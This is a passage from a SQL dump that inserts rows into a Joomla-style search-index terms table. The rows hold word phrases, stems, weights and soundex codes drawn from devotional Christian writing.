(293670, 'things new grounds', 'thing new grounds', 0, 1, 1.6, 'T52526532', 1, '*'),
(293671, 'things we achieve', 'thing we achieve', 0, 1, 1.5667, 'T521', 1, '*'),
(293672, 'this building', 'thi building', 0, 1, 1.4333, 'T214352', 1, '*'),
(293673, 'this building my', 'thi building my', 0, 1, 1.5333, 'T2143525', 1, '*'),
(293674, 'this word', 'thi word', 0, 1, 1.3, 'T263', 1, '*'),
(293675, 'this word in', 'thi word in', 0, 1, 1.4, 'T2635', 1, '*'),
(293676, 'this year over', 'thi year over', 0, 1, 1.4667, 'T2616', 1, '*'),
(293677, 'this year this', 'thi year this', 0, 1, 1.4667, 'T2632', 1, '*'),
(293678, 'those are', 'those are', 0, 1, 1.3, 'T260', 1, '*'),
(293679, 'those are their', 'those are their', 0, 1, 1.5, 'T2636', 1, '*'),
(293680, 'those words let', 'those words let', 0, 1, 1.5, 'T263243', 1, '*'),
(293681, 'time to pray', 'time to pray', 0, 1, 1.4, 'T5316', 1, '*'),
(293682, 'to complete', 'to complete', 0, 1, 1.3667, 'T25143', 1, '*'),
(293683, 'to complete his', 'to complete his', 0, 1, 1.5, 'T251432', 1, '*'),
(293684, 'to pray in', 'to pray in', 0, 1, 1.3333, 'T165', 1, '*'),
(293685, 'to this', 'to this', 0, 1, 1.2333, 'T200', 1, '*'),
(293686, 'to this word', 'to this word', 0, 1, 1.4, 'T263', 1, '*'),
(293687, 'today with', 'todai with', 0, 1, 1.3333, 'T000', 1, '*'),
(293688, 'today with the', 'todai with the', 0, 1, 1.4667, 'T000', 1, '*'),
(293689, 'tongues just', 'tongu just', 0, 1, 1.4, 'T523', 1, '*'),
(293690, 'tongues just let', 'tongu just let', 0, 1, 1.5333, 'T52343', 1, '*'),
(293691, 'took 52', 'took 52', 0, 1, 1.2333, 'T200', 1, '*'),
(293692, 'took 52 weeks', 'took 52 weeks', 0, 1, 1.4333, 'T200', 1, '*'),
(293693, 'two directions', 'two directions', 0, 1, 1.4667, 'T62352', 1, '*'),
(293694, 'two directions they', 'two directions they', 0, 1, 1.6333, 'T623523', 1, '*'),
(293695, 'unto me according', 'unto me according', 0, 1, 1.5667, 'U53526352', 1, '*'),
(293696, 'unto us', 'unto us', 0, 1, 1.2333, 'U532', 1, '*'),
(293697, 'unto us in', 'unto us in', 0, 1, 1.3333, 'U5325', 1, '*'),
(293698, 'us and re-introduce', 'us and re-introduce', 0, 1, 1.6333, 'U253653632', 1, '*'),
(293699, 'us new', 'us new', 0, 1, 1.2, 'U250', 1, '*'),
(293700, 'us new rooms', 'us new rooms', 0, 1, 1.4, 'U25652', 1, '*'),
(293701, 'visitation let', 'visit let', 0, 1, 1.4667, 'V23543', 1, '*'),
(293702, 'visitation let it', 'visit let it', 0, 1, 1.5667, 'V23543', 1, '*'),
(293703, 'was driven', 'wa driven', 0, 1, 1.3333, 'W23615', 1, '*'),
(293704, 'was driven back', 'wa driven back', 0, 1, 1.5, 'W2361512', 1, '*'),
(293705, 'was just', 'wa just', 0, 1, 1.2667, 'W230', 1, '*'),
(293706, 'was just a', 'wa just a', 0, 1, 1.3333, 'W230', 1, '*'),
(293707, 'was said', 'wa said', 0, 1, 1.2667, 'W230', 1, '*'),
(293708, 'was said of', 'wa said of', 0, 1, 1.3667, 'W231', 1, '*'),
(293709, 'we achieve', 'we achieve', 0, 1, 1.3333, 'W210', 1, '*'),
(293710, 'we achieve and', 'we achieve and', 0, 1, 1.4667, 'W2153', 1, '*'),
(293711, 'we are going', 'we are going', 0, 1, 1.4, 'W6252', 1, '*'),
(293712, 'we move with', 'we move with', 0, 1, 1.4, 'W513', 1, '*'),
(293713, 'weeks', 'week', 0, 0, 0.3333, 'W200', 1, '*'),
(293714, 'weeks to', 'week to', 0, 1, 1.2667, 'W230', 1, '*'),
(293715, 'weeks to complete', 'week to complete', 0, 1, 1.5667, 'W2325143', 1, '*'),
(293716, 'what has', 'what has', 0, 1, 1.2667, 'W320', 1, '*'),
(293717, 'what has not', 'what has not', 0, 1, 1.4, 'W3253', 1, '*'),
(293718, 'what the lord', 'what the lord', 0, 1, 1.4333, 'W3463', 1, '*'),
(293719, 'when israel', 'when israel', 0, 1, 1.3667, 'W5264', 1, '*'),
(293720, 'when israel left', 'when israel left', 0, 1, 1.5333, 'W526413', 1, '*'),
(293721, 'when the glory', 'when the glory', 0, 1, 1.4667, 'W53246', 1, '*'),
(293722, 'when the sea', 'when the sea', 0, 1, 1.4, 'W532', 1, '*'),
(293723, 'will finish', 'will finish', 0, 1, 1.3667, 'W4152', 1, '*'),
(293724, 'will finish it', 'will finish it', 0, 1, 1.4667, 'W41523', 1, '*'),
(293725, 'will happen till', 'will happen till', 0, 1, 1.5333, 'W41534', 1, '*'),
(293726, 'will move with', 'will move with', 0, 1, 1.4667, 'W4513', 1, '*'),
(293727, 'will perceive', 'will perceive', 0, 1, 1.4333, 'W41621', 1, '*'),
(293728, 'will perceive it', 'will perceive it', 0, 1, 1.5333, 'W416213', 1, '*'),
(293729, 'will see it', 'will see it', 0, 1, 1.3667, 'W423', 1, '*'),
(293730, 'with it and', 'with it and', 0, 1, 1.3667, 'W353', 1, '*'),
(293731, 'with the glory', 'with the glory', 0, 1, 1.4667, 'W3246', 1, '*'),
(293732, 'with the power', 'with the power', 0, 1, 1.4667, 'W316', 1, '*'),
(293733, 'with your own', 'with your own', 0, 1, 1.4333, 'W365', 1, '*'),
(293734, 'word in 2017”.', 'word in 2017”.', 0, 1, 1.4667, 'W635', 1, '*'),
(293735, 'words let it', 'word let it', 0, 1, 1.4, 'W63243', 1, '*'),
(293736, 'works of my', 'work of my', 0, 1, 1.3667, 'W6215', 1, '*'),
(293737, 'wrap', 'wrap', 0, 0, 0.2667, 'W610', 1, '*'),
(293738, 'wrap your', 'wrap your', 0, 1, 1.3, 'W616', 1, '*'),
(293739, 'wrap your life', 'wrap your life', 0, 1, 1.4667, 'W61641', 1, '*'),
(293740, 'year over', 'year over', 0, 1, 1.3, 'Y616', 1, '*'),
(293741, 'year over your', 'year over your', 0, 1, 1.4667, 'Y616', 1, '*'),
(293742, 'year this', 'year this', 0, 1, 1.3, 'Y632', 1, '*'),
(293743, 'year this is', 'year this is', 0, 1, 1.4, 'Y632', 1, '*'),
(293744, 'you and soon', 'you and soon', 0, 1, 1.4, 'Y5325', 1, '*'),
(293745, 'you are breaking', 'you are breaking', 0, 1, 1.5333, 'Y616252', 1, '*'),
(293746, 'you are prophesying', 'you are prophesying', 0, 1, 1.6333, 'Y6161252', 1, '*'),
(293747, 'you are tapping', 'you are tapping', 0, 1, 1.5, 'Y63152', 1, '*'),
(293748, 'you be complete', 'you be complete', 0, 1, 1.5, 'Y125143', 1, '*'),
(293749, 'you can rearrange', 'you can rearrange', 0, 1, 1.5667, 'Y25652', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(293750, 'you must operate', 'you must operate', 0, 1, 1.5333, 'Y523163', 1, '*'),
(293751, 'you must wrap', 'you must wrap', 0, 1, 1.4333, 'Y52361', 1, '*'),
(293752, 'you prophesy', 'you prophesy', 0, 1, 1.4, 'Y1612', 1, '*'),
(293753, 'you prophesy you', 'you prophesy you', 0, 1, 1.5333, 'Y1612', 1, '*'),
(293754, 'you speak those', 'you speak those', 0, 1, 1.5, 'Y21232', 1, '*'),
(293755, 'you will move', 'you will move', 0, 1, 1.4333, 'Y451', 1, '*'),
(293756, 'you will perceive', 'you will perceive', 0, 1, 1.5667, 'Y41621', 1, '*'),
(293757, 'your ancestry', 'your ancestry', 0, 1, 1.4333, 'Y65236', 1, '*'),
(293758, 'your ancestry you', 'your ancestry you', 0, 1, 1.5667, 'Y65236', 1, '*'),
(293759, 'your confession be', 'your confession be', 0, 1, 1.6, 'Y6251251', 1, '*'),
(293760, 'your confession this', 'your confession this', 0, 1, 1.6667, 'Y62512532', 1, '*'),
(293761, 'your experiences', 'your experiences', 0, 1, 1.5333, 'Y621652', 1, '*'),
(293762, 'your experiences in', 'your experiences in', 0, 1, 1.6333, 'Y6216525', 1, '*'),
(293763, 'your faith as', 'your faith as', 0, 1, 1.4333, 'Y6132', 1, '*'),
(293764, 'your mouth in', 'your mouth in', 0, 1, 1.4333, 'Y6535', 1, '*'),
(293765, 'your notebooks', 'your notebooks', 0, 1, 1.4667, 'Y65312', 1, '*'),
(293766, 'your notebooks keep', 'your notebooks keep', 0, 1, 1.6333, 'Y653121', 1, '*'),
(293767, 'your own mouth', 'your own mouth', 0, 1, 1.4667, 'Y653', 1, '*'),
(293768, 'your project', 'your project', 0, 1, 1.4, 'Y61623', 1, '*'),
(293769, 'your project must', 'your project must', 0, 1, 1.5667, 'Y61623523', 1, '*'),
(293770, 'your prophecy will', 'your prophecy will', 0, 1, 1.6, 'Y616124', 1, '*'),
(293771, 'yours', 'your', 0, 0, 0.3333, 'Y620', 1, '*'),
(293772, 'yours be', 'your be', 0, 1, 1.2667, 'Y621', 1, '*'),
(293773, 'yours be just', 'your be just', 0, 1, 1.4333, 'Y62123', 1, '*'),
(293774, '“be', '“be', 0, 0, 0.2, '“100', 1, '*'),
(293775, '“be it', '“be it', 0, 1, 1.2, '“130', 1, '*'),
(293776, '“be it unto', '“be it unto', 0, 1, 1.3667, '“1353', 1, '*'),
(293777, '“is saul', '“i saul', 0, 1, 1.2667, '“240', 1, '*'),
(293778, '“is saul also', '“i saul also', 0, 1, 1.4333, '“242', 1, '*'),
(293779, '“thou', '“thou', 0, 0, 0.3333, '“300', 1, '*'),
(293780, '“thou saith', '“thou saith', 0, 1, 1.3667, '“323', 1, '*'),
(293781, '“thou saith the', '“thou saith the', 0, 1, 1.5, '“323', 1, '*'),
(294132, '05 02', '05 02', 0, 1, 1.1667, '', 1, '*'),
(294133, '05 02 2017', '05 02 2017', 0, 1, 1.3333, '', 1, '*'),
(294134, '2017 it', '2017 it', 0, 1, 1.2333, 'I300', 1, '*'),
(294135, '2017 it is', '2017 it is', 0, 1, 1.3333, 'I320', 1, '*'),
(294136, '21 from', '21 from', 0, 1, 1.2333, 'F650', 1, '*'),
(294137, '21 from our', '21 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(294138, 'a banker or', 'a banker or', 0, 1, 1.3667, 'A1526', 1, '*'),
(294139, 'a boy', 'a boy', 0, 1, 1.1667, 'A100', 1, '*'),
(294140, 'a boy kill', 'a boy kill', 0, 1, 1.3333, 'A124', 1, '*'),
(294141, 'a discussion', 'a discussion', 0, 1, 1.4, 'A325', 1, '*'),
(294142, 'a discussion with', 'a discussion with', 0, 1, 1.5667, 'A3253', 1, '*'),
(294143, 'a giant', 'a giant', 0, 1, 1.2333, 'A253', 2, '*'),
(294144, 'a giant like', 'a giant like', 0, 1, 1.4, 'A25342', 1, '*'),
(294145, 'a housewife', 'a housewife', 0, 1, 1.3667, 'A210', 2, '*'),
(294146, 'a housewife or', 'a housewife or', 0, 1, 1.4667, 'A216', 1, '*'),
(294147, 'a place where', 'a place where', 0, 1, 1.4333, 'A1426', 1, '*'),
(294148, 'a shield for', 'a shield for', 0, 1, 1.4, 'A24316', 1, '*'),
(294149, 'a stone', 'a stone', 0, 1, 1.2333, 'A235', 1, '*'),
(294150, 'a stone thrown', 'a stone thrown', 0, 1, 1.4667, 'A235365', 1, '*'),
(294151, 'a struggle', 'a struggle', 0, 1, 1.3333, 'A23624', 1, '*'),
(294152, 'a struggle in', 'a struggle in', 0, 1, 1.4333, 'A236245', 1, '*'),
(294153, 'a very strong', 'a very strong', 0, 1, 1.4333, 'A1623652', 1, '*'),
(294154, 'a worshipper', 'a worshipper', 0, 1, 1.4, 'A6216', 1, '*'),
(294155, 'a worshipper respect', 'a worshipper respect', 0, 1, 1.6667, 'A62162123', 1, '*'),
(294156, 'abednego', 'abednego', 0, 0, 0.5333, 'A1352', 1, '*'),
(294157, 'abednego that', 'abednego that', 0, 1, 1.4333, 'A13523', 1, '*'),
(294158, 'abednego that kept', 'abednego that kept', 0, 1, 1.6, 'A13523213', 1, '*'),
(294159, 'abide', 'abid', 0, 0, 0.3333, 'A130', 1, '*'),
(294160, 'abide under', 'abid under', 0, 1, 1.3667, 'A13536', 1, '*'),
(294161, 'abide under the', 'abid under the', 0, 1, 1.5, 'A135363', 1, '*'),
(294162, 'able to participate', 'abl to participate', 0, 1, 1.6333, 'A143163213', 1, '*'),
(294163, 'again stay', 'again stay', 0, 1, 1.3333, 'A2523', 1, '*'),
(294164, 'again stay away', 'again stay away', 0, 1, 1.5, 'A2523', 1, '*'),
(294165, 'almighty his', 'almighti his', 0, 1, 1.4, 'A45232', 1, '*'),
(294166, 'almighty his presence', 'almighti his presence', 0, 1, 1.7, 'A4523216252', 1, '*'),
(294167, 'and abednego', 'and abednego', 0, 1, 1.4, 'A531352', 1, '*'),
(294168, 'and abednego that', 'and abednego that', 0, 1, 1.5667, 'A5313523', 1, '*'),
(294169, 'and complete', 'and complete', 0, 1, 1.4, 'A5325143', 1, '*'),
(294170, 'and complete don\'t', 'and complete don', 0, 1, 1.6, 'A532514353', 1, '*'),
(294171, 'and don\'t boast', 'and don boast', 0, 1, 1.5, 'A5353123', 1, '*'),
(294172, 'and god\'s servant', 'and god servant', 0, 1, 1.5667, 'A532326153', 1, '*'),
(294173, 'and i have', 'and i have', 0, 1, 1.3333, 'A531', 2, '*'),
(294174, 'and not how', 'and not how', 0, 1, 1.3667, 'A5353', 1, '*'),
(294175, 'and take it', 'and take it', 0, 1, 1.3667, 'A5323', 1, '*'),
(294176, 'and that\'s', 'and that', 0, 1, 1.3333, 'A532', 1, '*'),
(294177, 'and that\'s the', 'and that the', 0, 1, 1.4667, 'A5323', 1, '*'),
(294178, 'and tremble', 'and tremble', 0, 1, 1.3667, 'A536514', 1, '*'),
(294179, 'and tremble at', 'and tremble at', 0, 1, 1.4667, 'A5365143', 1, '*'),
(294180, 'anything that draw', 'anyth that draw', 0, 1, 1.6, 'A535236', 1, '*'),
(294181, 'anything that there', 'anyth that there', 0, 1, 1.6333, 'A535236', 1, '*'),
(294182, 'are a banker', 'ar a banker', 0, 1, 1.4, 'A61526', 1, '*'),
(294183, 'are a housewife', 'ar a housewife', 0, 1, 1.5, 'A621', 1, '*'),
(294184, 'are few of', 'ar few of', 0, 1, 1.3333, 'A610', 1, '*'),
(294185, 'are so many', 'ar so many', 0, 1, 1.3667, 'A625', 1, '*'),
(294186, 'are walking', 'ar walking', 0, 1, 1.3667, 'A64252', 1, '*'),
(294187, 'are walking there', 'ar walking there', 0, 1, 1.5667, 'A6425236', 1, '*'),
(294188, 'around but', 'around but', 0, 1, 1.3333, 'A65313', 1, '*'),
(294189, 'around but his', 'around but his', 0, 1, 1.4667, 'A653132', 1, '*'),
(294190, 'as a very', 'as a very', 0, 1, 1.3, 'A216', 1, '*'),
(294191, 'ashamed', 'asham', 0, 0, 0.4667, 'A253', 1, '*'),
(294192, 'ashamed of', 'asham of', 0, 1, 1.3333, 'A2531', 1, '*'),
(294193, 'ashamed of anything', 'asham of anything', 0, 1, 1.6333, 'A25315352', 1, '*'),
(294194, 'assignment don\'t do', 'assign don do', 0, 1, 1.6333, 'A25353', 1, '*'),
(294195, 'assignment that god', 'assign that god', 0, 1, 1.6333, 'A25323', 1, '*'),
(294196, 'at his', 'at his', 0, 1, 1.2, 'A320', 2, '*'),
(294197, 'at his words', 'at his words', 0, 1, 1.4, 'A32632', 1, '*'),
(294198, 'away your marriage', 'awai your marriage', 0, 1, 1.6, 'A6562', 1, '*'),
(294199, 'banker or', 'banker or', 0, 1, 1.3, 'B526', 1, '*'),
(294200, 'banker or you', 'banker or you', 0, 1, 1.4333, 'B526', 1, '*'),
(294201, 'be a place', 'be a place', 0, 1, 1.3333, 'B420', 1, '*'),
(294202, 'be a worshipper', 'be a worshipper', 0, 1, 1.5, 'B6216', 1, '*'),
(294203, 'be born again', 'be born again', 0, 1, 1.4333, 'B6525', 1, '*'),
(294204, 'be poor', 'be poor', 0, 1, 1.2333, 'B600', 1, '*'),
(294205, 'be poor for', 'be poor for', 0, 1, 1.3667, 'B616', 1, '*'),
(294206, 'be sick', 'be sick', 0, 1, 1.2333, 'B200', 1, '*'),
(294207, 'be sick for', 'be sick for', 0, 1, 1.3667, 'B216', 1, '*'),
(294208, 'be thorough', 'be thorough', 0, 1, 1.3667, 'B362', 1, '*'),
(294209, 'be thorough and', 'be thorough and', 0, 1, 1.5, 'B36253', 1, '*'),
(294210, 'bear will', 'bear will', 0, 1, 1.3, 'B640', 1, '*'),
(294211, 'bear will deliver', 'bear will deliver', 0, 1, 1.5667, 'B643416', 1, '*'),
(294212, 'because you know', 'becaus you know', 0, 1, 1.5333, 'B250', 1, '*'),
(294213, 'become ashamed', 'becom ashamed', 0, 1, 1.4667, 'B25253', 1, '*'),
(294214, 'become ashamed of', 'becom ashamed of', 0, 1, 1.5667, 'B252531', 1, '*'),
(294215, 'below are few', 'below are few', 0, 1, 1.4333, 'B461', 1, '*'),
(294216, 'bible says he', 'bibl says he', 0, 1, 1.4333, 'B420', 1, '*'),
(294217, 'boast because', 'boast because', 0, 1, 1.4333, 'B2312', 1, '*'),
(294218, 'boast because you', 'boast because you', 0, 1, 1.5667, 'B2312', 1, '*'),
(294219, 'books coming', 'book coming', 0, 1, 1.4, 'B252', 1, '*'),
(294220, 'books coming soon', 'book coming soon', 0, 1, 1.5667, 'B2525', 1, '*'),
(294221, 'born again stay', 'born again stay', 0, 1, 1.5, 'B652523', 1, '*'),
(294222, 'boy', 'boi', 0, 0, 0.2, 'B000', 1, '*'),
(294223, 'boy kill', 'boi kill', 0, 1, 1.2667, 'B240', 1, '*'),
(294224, 'boy kill a', 'boi kill a', 0, 1, 1.3333, 'B240', 1, '*'),
(294225, 'broken hearted', 'broken hearted', 0, 1, 1.4667, 'B62563', 1, '*'),
(294226, 'broken hearted and', 'broken hearted and', 0, 1, 1.6, 'B6256353', 1, '*'),
(294227, 'business man in', 'busi man in', 0, 1, 1.5, 'B2525', 1, '*'),
(294228, 'but his presence', 'but his presence', 0, 1, 1.5333, 'B3216252', 1, '*'),
(294229, 'by a', 'by a', 0, 1, 1.1333, 'B000', 1, '*'),
(294230, 'by a boy', 'by a boy', 0, 1, 1.2667, 'B000', 1, '*'),
(294231, 'callings', 'call', 0, 0, 0.5333, 'C452', 3, '*'),
(294232, 'callings of', 'call of', 0, 1, 1.3667, 'C4521', 3, '*'),
(294233, 'callings of god', 'call of god', 0, 1, 1.5, 'C452123', 1, '*'),
(294234, 'can a', 'can a', 0, 1, 1.1667, 'C500', 1, '*'),
(294235, 'can a stone', 'can a stone', 0, 1, 1.3667, 'C5235', 1, '*'),
(294236, 'can fail', 'can fail', 0, 1, 1.2667, 'C514', 1, '*'),
(294237, 'can fail around', 'can fail around', 0, 1, 1.5, 'C514653', 1, '*'),
(294238, 'cannot be poor', 'cannot be poor', 0, 1, 1.4667, 'C5316', 1, '*'),
(294239, 'cannot be sick', 'cannot be sick', 0, 1, 1.4667, 'C5312', 1, '*'),
(294240, 'cannot suffer', 'cannot suffer', 0, 1, 1.4333, 'C53216', 1, '*'),
(294241, 'cannot suffer long', 'cannot suffer long', 0, 1, 1.6, 'C53216452', 1, '*'),
(294242, 'case in his', 'case in his', 0, 1, 1.3667, 'C520', 1, '*'),
(294243, 'coming soon', 'come soon', 0, 1, 1.3667, 'C525', 1, '*'),
(294244, 'coming soon titled', 'come soon titled', 0, 1, 1.6, 'C525343', 1, '*'),
(294245, 'commonwealth', 'commonwealth', 0, 0, 0.8, 'C543', 1, '*'),
(294246, 'commonwealth when', 'commonwealth when', 0, 1, 1.5667, 'C5435', 1, '*'),
(294247, 'commonwealth when he', 'commonwealth when he', 0, 1, 1.6667, 'C5435', 1, '*'),
(294248, 'complete don\'t', 'complet don', 0, 1, 1.4667, 'C514353', 1, '*'),
(294249, 'complete don\'t ever', 'complet don ever', 0, 1, 1.6333, 'C51435316', 1, '*'),
(294250, 'connected to developing', 'connect to developing', 0, 1, 1.7667, 'C52314152', 1, '*'),
(294251, 'creates', 'creat', 0, 0, 0.4667, 'C632', 1, '*'),
(294252, 'creates a', 'creat a', 0, 1, 1.3, 'C632', 1, '*'),
(294253, 'creates a shield', 'creat a shield', 0, 1, 1.5333, 'C63243', 1, '*'),
(294254, 'daniel shadrach', 'daniel shadrach', 0, 1, 1.5, 'D542362', 1, '*'),
(294255, 'daniel shadrach and', 'daniel shadrach and', 0, 1, 1.6333, 'D54236253', 1, '*'),
(294256, 'david himself', 'david himself', 0, 1, 1.4333, 'D135241', 1, '*'),
(294257, 'david himself said', 'david himself said', 0, 1, 1.6, 'D13524123', 1, '*'),
(294258, 'david it was', 'david it was', 0, 1, 1.4, 'D132', 1, '*'),
(294259, 'david that', 'david that', 0, 1, 1.3333, 'D130', 1, '*'),
(294260, 'david that killed', 'david that killed', 0, 1, 1.5667, 'D13243', 1, '*'),
(294261, 'deeply', 'deepli', 0, 0, 0.4, 'D140', 1, '*'),
(294262, 'deeply in', 'deepli in', 0, 1, 1.3, 'D145', 1, '*'),
(294263, 'deeply in one', 'deepli in one', 0, 1, 1.4333, 'D145', 1, '*'),
(294264, 'define the', 'defin the', 0, 1, 1.3333, 'D153', 1, '*'),
(294265, 'define the assignment', 'defin the assignment', 0, 1, 1.7, 'D153253', 1, '*'),
(294266, 'deliver you', 'deliv you', 0, 1, 1.3667, 'D416', 1, '*'),
(294267, 'deliver you into', 'deliv you into', 0, 1, 1.5333, 'D41653', 1, '*'),
(294268, 'delivered me', 'deliv me', 0, 1, 1.4, 'D41635', 1, '*'),
(294269, 'delivered me from', 'deliv me from', 0, 1, 1.5667, 'D41635165', 1, '*'),
(294270, 'destiny and take', 'destini and take', 0, 1, 1.5333, 'D23532', 1, '*'),
(294271, 'developing you', 'develop you', 0, 1, 1.4667, 'D14152', 1, '*'),
(294272, 'developing you for', 'develop you for', 0, 1, 1.6, 'D1415216', 1, '*'),
(294273, 'devil wants us', 'devil wants us', 0, 1, 1.4667, 'D14532', 1, '*'),
(294274, 'discussion with', 'discuss with', 0, 1, 1.5, 'D253', 1, '*'),
(294275, 'discussion with him', 'discuss with him', 0, 1, 1.6333, 'D2535', 1, '*'),
(294276, 'do anything', 'do anything', 0, 1, 1.3667, 'D5352', 1, '*'),
(294277, 'do anything that', 'do anything that', 0, 1, 1.5333, 'D53523', 1, '*'),
(294278, 'do privately', 'do privately', 0, 1, 1.4, 'D16134', 1, '*'),
(294279, 'do privately or', 'do privately or', 0, 1, 1.5, 'D161346', 1, '*'),
(294280, 'don\'t boast', 'don boast', 0, 1, 1.3667, 'D53123', 1, '*'),
(294281, 'don\'t boast because', 'don boast because', 0, 1, 1.6333, 'D5312312', 1, '*'),
(294282, 'don\'t do privately', 'don do privately', 0, 1, 1.6, 'D5316134', 1, '*'),
(294283, 'don\'t ever', 'don ever', 0, 1, 1.3333, 'D5316', 1, '*'),
(294284, 'don\'t ever become', 'don ever become', 0, 1, 1.5667, 'D5316125', 1, '*'),
(294285, 'don\'t ever do', 'don ever do', 0, 1, 1.4333, 'D53163', 1, '*'),
(294286, 'don\'t get involved', 'don get involved', 0, 1, 1.6, 'D532351413', 1, '*'),
(294287, 'don\'t get out', 'don get out', 0, 1, 1.4333, 'D5323', 1, '*'),
(294288, 'don\'t measure', 'don measure', 0, 1, 1.4333, 'D53526', 1, '*'),
(294289, 'don\'t measure yourself', 'don measure yourself', 0, 1, 1.7333, 'D53526241', 1, '*'),
(294290, 'draw the presence', 'draw the presence', 0, 1, 1.5667, 'D6316252', 1, '*'),
(294291, 'dwelleth', 'dwelleth', 0, 0, 0.5333, 'D430', 1, '*'),
(294292, 'dwelleth in', 'dwelleth in', 0, 1, 1.3667, 'D435', 1, '*'),
(294293, 'dwelleth in the', 'dwelleth in the', 0, 1, 1.5, 'D4353', 1, '*'),
(294294, 'ever become ashamed', 'ever become ashamed', 0, 1, 1.6333, 'E16125253', 1, '*'),
(294295, 'ever do', 'ever do', 0, 1, 1.2333, 'E163', 1, '*'),
(294296, 'ever do anything', 'ever do anything', 0, 1, 1.5333, 'E1635352', 1, '*'),
(294297, 'everything can', 'everyth can', 0, 1, 1.4667, 'E163525', 1, '*'),
(294298, 'everything can fail', 'everyth can fail', 0, 1, 1.6333, 'E16352514', 1, '*'),
(294299, 'explain them', 'explain them', 0, 1, 1.4, 'E214535', 1, '*'),
(294300, 'explain them deeply', 'explain them deeply', 0, 1, 1.6333, 'E214535314', 1, '*'),
(294301, 'fail around', 'fail around', 0, 1, 1.3667, 'F4653', 1, '*'),
(294302, 'fail around but', 'fail around but', 0, 1, 1.5, 'F465313', 1, '*'),
(294303, 'few of', 'few of', 0, 1, 1.2, 'F000', 1, '*'),
(294304, 'few of them', 'few of them', 0, 1, 1.3667, 'F350', 1, '*'),
(294305, 'fire it', 'fire it', 0, 1, 1.2333, 'F630', 1, '*'),
(294306, 'fire it was', 'fire it was', 0, 1, 1.3667, 'F632', 1, '*'),
(294307, 'for long that\'s', 'for long that', 0, 1, 1.5, 'F645232', 1, '*'),
(294308, 'for long when', 'for long when', 0, 1, 1.4333, 'F64525', 1, '*'),
(294309, 'for you till', 'for you till', 0, 1, 1.4, 'F634', 1, '*'),
(294310, 'from sin don\'t', 'from sin don', 0, 1, 1.4667, 'F6525353', 1, '*'),
(294311, 'from the hand', 'from the hand', 0, 1, 1.4333, 'F65353', 2, '*'),
(294312, 'from the lion', 'from the lion', 0, 1, 1.4333, 'F65345', 1, '*'),
(294313, 'from you if', 'from you if', 0, 1, 1.3667, 'F651', 1, '*'),
(294314, 'get out of', 'get out of', 0, 1, 1.3333, 'G310', 1, '*'),
(294315, 'get you', 'get you', 0, 1, 1.2333, 'G300', 1, '*'),
(294316, 'get you through', 'get you through', 0, 1, 1.5, 'G362', 1, '*'),
(294317, 'giant', 'giant', 0, 0, 0.3333, 'G530', 2, '*'),
(294318, 'giant like', 'giant like', 0, 1, 1.3333, 'G5342', 1, '*'),
(294319, 'giant like that', 'giant like that', 0, 1, 1.5, 'G53423', 1, '*'),
(294320, 'go and god\'s', 'go and god', 0, 1, 1.4, 'G53232', 1, '*'),
(294321, 'god away your', 'god away your', 0, 1, 1.4333, 'G360', 1, '*'),
(294322, 'god has connected', 'god has connected', 0, 1, 1.5667, 'G32523', 1, '*'),
(294323, 'god he will', 'god he will', 0, 1, 1.3667, 'G340', 1, '*'),
(294324, 'god into', 'god into', 0, 1, 1.2667, 'G353', 1, '*'),
(294325, 'god into your', 'god into your', 0, 1, 1.4333, 'G3536', 1, '*'),
(294326, 'god listed', 'god listed', 0, 1, 1.3333, 'G3423', 1, '*'),
(294327, 'god listed below', 'god listed below', 0, 1, 1.5333, 'G342314', 1, '*'),
(294328, 'god that killed', 'god that killed', 0, 1, 1.5, 'G3243', 1, '*'),
(294329, 'god\'s presence is', 'god presence is', 0, 1, 1.5667, 'G3216252', 1, '*'),
(294330, 'going with you', 'go with you', 0, 1, 1.4667, 'G523', 1, '*'),
(294331, 'goliath', 'goliath', 0, 0, 0.4667, 'G430', 1, '*'),
(294332, 'goliath how', 'goliath how', 0, 1, 1.3667, 'G430', 1, '*'),
(294333, 'goliath how can', 'goliath how can', 0, 1, 1.5, 'G4325', 1, '*'),
(294334, 'goliath it', 'goliath it', 0, 1, 1.3333, 'G430', 1, '*'),
(294335, 'goliath it was', 'goliath it was', 0, 1, 1.4667, 'G432', 1, '*'),
(294336, 'grieve', 'griev', 0, 0, 0.4, 'G610', 2, '*'),
(294337, 'grieve the', 'griev the', 0, 1, 1.3333, 'G613', 2, '*'),
(294338, 'grieve the holy', 'griev the holy', 0, 1, 1.5, 'G6134', 2, '*'),
(294339, 'hand of', 'hand of', 0, 1, 1.2333, 'H531', 2, '*'),
(294340, 'hand of the', 'hand of the', 0, 1, 1.3667, 'H5313', 1, '*'),
(294341, 'handle assignment', 'handl assignment', 0, 1, 1.5667, 'H534253', 1, '*'),
(294342, 'handle assignment don\'t', 'handl assignment don', 0, 1, 1.7667, 'H53425353', 1, '*'),
(294343, 'hands the', 'hand the', 0, 1, 1.3, 'H5323', 1, '*'),
(294344, 'hands the bible', 'hand the bible', 0, 1, 1.5, 'H532314', 1, '*'),
(294345, 'has connected', 'ha connected', 0, 1, 1.4333, 'H2523', 1, '*'),
(294346, 'has connected to', 'ha connected to', 0, 1, 1.5333, 'H2523', 1, '*'),
(294347, 'has to do', 'ha to do', 0, 1, 1.3, 'H230', 2, '*'),
(294348, 'have money', 'have money', 0, 1, 1.3333, 'H150', 1, '*'),
(294349, 'have money and', 'have money and', 0, 1, 1.4667, 'H153', 1, '*'),
(294350, 'have taken time', 'have taken time', 0, 1, 1.5, 'H132535', 1, '*'),
(294351, 'having a discussion', 'have a discussion', 0, 1, 1.6333, 'H152325', 1, '*'),
(294352, 'he is there', 'he is there', 0, 1, 1.3667, 'H236', 1, '*'),
(294353, 'he that', 'he that', 0, 1, 1.2333, 'H300', 2, '*'),
(294354, 'he that dwelleth', 'he that dwelleth', 0, 1, 1.5333, 'H343', 1, '*'),
(294355, 'he will get', 'he will get', 0, 1, 1.3667, 'H423', 1, '*'),
(294356, 'he\'s there', 'he there', 0, 1, 1.3333, 'H236', 1, '*'),
(294357, 'he\'s there you', 'he there you', 0, 1, 1.4667, 'H236', 1, '*'),
(294358, 'heart 05 02', 'heart 05 02', 0, 1, 1.3667, 'H630', 1, '*'),
(294359, 'hearted', 'heart', 0, 0, 0.4667, 'H630', 1, '*'),
(294360, 'hearted and', 'heart and', 0, 1, 1.3667, 'H6353', 1, '*'),
(294361, 'hearted and tremble', 'heart and tremble', 0, 1, 1.6333, 'H63536514', 1, '*'),
